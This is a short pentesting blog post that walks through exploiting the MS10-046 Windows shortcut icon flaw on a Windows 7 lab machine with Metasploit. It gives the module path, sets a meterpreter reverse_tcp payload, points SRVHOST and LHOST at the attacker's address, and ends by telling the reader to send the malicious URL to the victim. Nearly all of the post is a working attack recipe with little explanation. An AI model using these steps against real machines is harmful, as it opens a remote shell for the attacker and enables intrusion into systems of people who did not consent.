본문 바로가기

Research/Pentesting

[Pentesting] Windows 7 Exploit with ms10_046

- Windows 7 Exploit with ms10_046

 

Vulnerability :  MS10_046 

 

PayLoadwindows/meterpreter/reverse_tcp  

 

Platforms : Windows 

 

Architectures : x86

 

Target : 192.168.0.2 ( Windows 7 Home Premium K sp1 )

 

Attacker : 192.168.233.131 ( Windows7 Ultimate sp1 )

 

 
- Process - 

This time we will use vuln called MS10_046

 

MS10_046 :

Shell Link Code Execution , Using specially controled go-to-icon, Executing Remote code is allowed by this vuln

 

Load module..

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

 

 

payload : windows/merterpreter/reverse_tcp

 

 

Cmd : set payload windows/meterpreter/reverse_tcp

 

Cmd : show options

u can check options needed to exploit

 

SRVHOST attacker's ip // my ip

LHOST -> my ip

 

 

Exploit !!!!

 

 

OK! send that url to victim

 

- End